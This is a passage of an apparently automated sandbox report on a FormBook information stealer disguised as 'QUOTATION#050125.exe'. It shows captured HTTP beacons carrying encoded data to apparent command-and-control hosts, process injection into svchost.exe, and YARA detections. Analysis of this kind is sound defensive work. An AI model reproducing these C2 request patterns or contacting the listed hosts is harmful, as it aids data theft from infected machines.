                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIM39W/lId/v6bhPUocfm9I=
                                                                                    Timestamp: Jan 9, 2025 16:58:59.607426882 CET  Bytes transferred: 1289  Direction: IN
                                                                                    HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:58:59 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Timestamp: Jan 9, 2025 16:58:59.607434988 CET  Bytes transferred: 200  Direction: IN
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID: 76  Source IP: 192.168.11.30  Source Port: 49901  Destination IP: 160.25.166.123  Destination Port: 80
                                                                                    Timestamp: Jan 9, 2025 16:59:02.153439999 CET  Bytes transferred: 2578  Direction: OUT
                                                                                    POST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Ascii: 6B-l7F= [TRUNCATED]
                                                                                    Timestamp: Jan 9, 2025 16:59:02.153476000 CET  Bytes transferred: 1346  Direction: OUT
                                                                                    Data Ascii: QTy99lpehz3bO1ipmycJAVEdrO5clyRQAaeql+lSaYd2xv6Gnvh+4vG0/+oujio1pEQuve9WCP0txKKkh87NEDCELPCh0ATbOFvPBOkEUFyWGsllWWgIIocZdsjxbLFfRS3xJrjoge8+dovTyhkPfG7LjCDsC57MU6Pxo3KNAVxdlv3tzj1Z5Xj6uwKiczT7dlwgDyeZIIAADi4Wq48A9O1Vq8QT3dUu+0bbvvxGm++tgkDgUMv
                                                                                    Timestamp: Jan 9, 2025 16:59:02.498395920 CET  Bytes transferred: 1289  Direction: IN
                                                                                    HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:59:02 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Timestamp: Jan 9, 2025 16:59:02.498403072 CET  Bytes transferred: 200  Direction: IN
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID: 77  Source IP: 192.168.11.30  Source Port: 49902  Destination IP: 160.25.166.123  Destination Port: 80
                                                                                    Timestamp: Jan 9, 2025 16:59:05.045717001 CET  Bytes transferred: 531  Direction: OUT
                                                                                    GET /bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Timestamp: Jan 9, 2025 16:59:05.402046919 CET  Bytes transferred: 1289  Direction: IN
                                                                                    HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:59:05 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Timestamp: Jan 9, 2025 16:59:05.402055979 CET  Bytes transferred: 200  Direction: IN
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID: 78  Source IP: 192.168.11.30  Source Port: 49903  Destination IP: 172.67.132.227  Destination Port: 80
                                                                                    Timestamp: Jan 9, 2025 16:59:10.546438932 CET  Bytes transferred: 799  Direction: OUT
                                                                                    POST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 42 4d 77 73 35 6d 77 32 4b 69 5a 37 62 45 42 6a 78 4a 4e 76 51 3d 3d
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZBMws5mw2KiZ7bEBjxJNvQ==
                                                                                    Jan 9, 2025 16:59:10.674277067 CET | 804 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:59:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:59:10 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysXntGnS8B72ZmhECUMvE4yqTWTyChLUqF7Gaihd0FNAufXV8z2R5UH6OPMbxkmpT2cZ2cdOxsL%2F9eHtFcl6HbI3d4tz23XoVirnY19%2BWH1hv3fq%2FVPviehltB0yOET4ECDw"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a20b48fda489-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session ID: 79 | Source IP: 192.168.11.30 | Source Port: 49904 | Destination IP: 172.67.132.227 | Destination Port: 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:59:13.202044964 CET | 819 | OUT | POST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 65 47 31 2f 30 53 4c 47 48 4b 67 39 2b 78 4c 64 46 64 37 6b 3d
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3eG1/0SLGHKg9+xLdFd7k=
                                                                                    Jan 9, 2025 16:59:13.329472065 CET | 804 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:59:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:59:13 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z2I5WlTKgn8UqTM4RUXGvKzYqLC7EZrClTeuNcpDxpak%2B5v9Wv0xMjbeEl%2F%2FFj3SAqWYUGvVOD4cr4Wk5YVI8dQk0cxbOaPXdVtIhu4GAdYb0Hlr9K1Ow2mTuwLsTlhiL3h5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a21be9fff5fc-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session ID: 80 | Source IP: 192.168.11.30 | Source Port: 49905 | Destination IP: 172.67.132.227 | Destination Port: 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:59:15.861751080 CET | 2578 | OUT | POST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 44 6d 48 73 6e 4c 34 6c 33 48 53 30 52 37 46 33 35 58 63 53 55 37 66 55 4a 45 5a 75 59 71 44 78 42 54 77 61 58 34 72 70 36 47 4d 35 6f 47 68 6c 49 31 55 6d 6c 59 39 73 51 72 41 58 54 72 57 45 70 4b 35 4f 6e 31 62 6b 35 68 53 4d 73 33 7a 4a 41 51 69 76 41 4e 4a 73 51 68 51 79 64 63 6d 35 37 58 53 68 7a 33 4d 37 30 65 37 79 32 56 4a 70 59 76 42 4d 2f 70 30 47 36 62 5a 59 46 4c 45 31 37 73 61 44 73 44 58 5a 38 44 38 4e 47 47 5a 42 76 43 6b 77 6f 49 39 78 38 4d 6b 46 6b 35 56 4f 33 30 4e 33 5a 6c 43 7a 4e 42 67 4d 72 47 68 38 35 74 57 51 38 53 50 6a 43 67 66 51 50 38 75 59 35 6d [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj5DmHsnL4l3HS0R7F35XcSU7fUJEZuYqDxBTwaX4rp6GM5oGhlI1UmlY9sQrAXTrWEpK5On1bk5hSMs3zJAQivANJsQhQydcm57XShz3M70e7y2VJpYvBM/p0G6bZYFLE17saDsDXZ8D8NGGZBvCkwoI9x8MkFk5VO30N3ZlCzNBgMrGh85tWQ8SPjCgfQP8uY5mKx19A4aV2kQNFygbqY6Nenmn9LMeUkq1SX1pyBYELdeAHjKuudTwXQly7qej7NTBAxTT0601ykFobqbQFMi+RjZcVbNG+iA7/lm8oHpEtM5qAtaU8jjXY6jscQXlzqvVY0ud0rNFfBRT1zdJCM04oIjBnROixhF2w8TDdCP2Cub4aJznTev+tFCP0A3Z9XAJUvIOOXfuxIGGmV8YRADxypiHmixP8hQcV1vCcfo175gzSzb6U5gpaCUTvl9pVH+KEIie5+RXJ0MizIF18qiN8i68PuIMk4SPjDxHJlYAnaHBbM5zuswp03c+mqAhlBQGWchFfnzh9gLYuSMrPAXcX2pC2bcFBZtnLA9jIwwFFRuMq/GqQL3/uTBEKjHmbgrmG/PCGq602Cc7JgGzP2kL8xOA2b3H/0kzGRELwUE0SAYINvpA13Un9dksgP70+cdjAva0fqPzQUI+VC/J2QeWGrOllVfV563WZ8vKq8O02KBVU6Gxuf4513UfHdp2xJu+CjimJ8bshOkFkRkZEv/XXiij/WHBedO2MQpqykIDMwvmO3p9cKuleFHbtts8uVny+f4FGvUSOgAtWOngYc0kidYIZmSOfcd0ht3WB0vv8YN/4WRDlF4Ik/8VfUlmIWotnr0MyQgyzH5tAXLajD9t0aNDwr/g+pLU3L [TRUNCATED]
                                                                                    Jan 9, 2025 16:59:15.861814022 CET | 1358 | OUT | Data Raw: 4a 38 6d 51 34 6a 2b 68 2f 39 6c 4f 6d 32 46 2f 47 55 44 58 51 47 5a 4b 5a 57 63 48 74 70 56 34 54 55 44 49 79 4a 79 42 73 62 72 44 30 51 51 33 72 50 6b 73 73 41 42 52 52 79 67 49 4f 44 6a 32 73 47 56 35 6b 65 6b 32 78 79 63 41 48 37 4b 6e 7a 4d
                                                                                    Data Ascii: J8mQ4j+h/9lOm2F/GUDXQGZKZWcHtpV4TUDIyJyBsbrD0QQ3rPkssABRRygIODj2sGV5kek2xycAH7KnzM1Ct8y5KSdJVCSnJ9pdxqFrn1JoGF0tB0MBpetM0M6xsPy3Y1wPgg9KnYdiEs5a5LIdQaU8jdzkdDya3DAQHCDmPImh8OXgghynKsNwRFsIhzoShYKiqCV2Q7EJzoAawJvRn3OKTTmTZXsw9S8RR1KNLEimPm9I9My
                                                                                    Jan 9, 2025 16:59:15.987556934 CET | 808 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:59:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:59:15 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Swq6fxBwal2IZNOByHd5oKPbFgcHBXL%2BdP%2FXWnOZ6LI5r3DNa57SUY105LSthTH%2F1HwaGU%2F7DLjYEXUdjLLgKRvSYDV849pmxyLoPFhzL9OO7bbvP%2BOFUmj0St2z2oNrk8Uj"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a22c8ad2e80d-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session ID: 81 | Source IP: 192.168.11.30 | Source Port: 49906 | Destination IP: 172.67.132.227 | Destination Port: 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:59:18.525099039 CET | 535 | OUT | GET /kj1o/?80k=lRapCPMXgDk&6B-l7F=aFAzn/LT2mOAaNQADN8poQDHC/ShywB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQsmt/Lr8OGOl6Yl/nOLw= HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:59:18.657053947 CET | 781 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:59:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:59:18 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JUBbrZ%2B4VfL3zQsjhx1JUZhgtSqYZrioJEZEnT2eNfJ3LcfVG7cj6Cog0SN2kR7fVO01lj3ZPW8zvbxohNEokyEBOpFPHOEHTkvPEtMIvUOZBn6%2F6%2BujoHD0icr8pt6yTwXc"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a23d2f32eaf5-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Target ID:2
                                                                                    Start time:10:52:32
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Users\user\Desktop\QUOTATION#050125.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\QUOTATION#050125.exe"
                                                                                    Imagebase:0xc0000
                                                                                    File size:1'755'136 bytes
                                                                                    MD5 hash:B1261DE24D9BCBF7395AE21722D32A37
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:10:52:33
                                                                                    Start date:09/01/2025
                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\QUOTATION#050125.exe"
                                                                                    Imagebase:0xe30000
                                                                                    File size:47'016 bytes
                                                                                    MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:10:53:29
                                                                                    Start date:09/01/2025
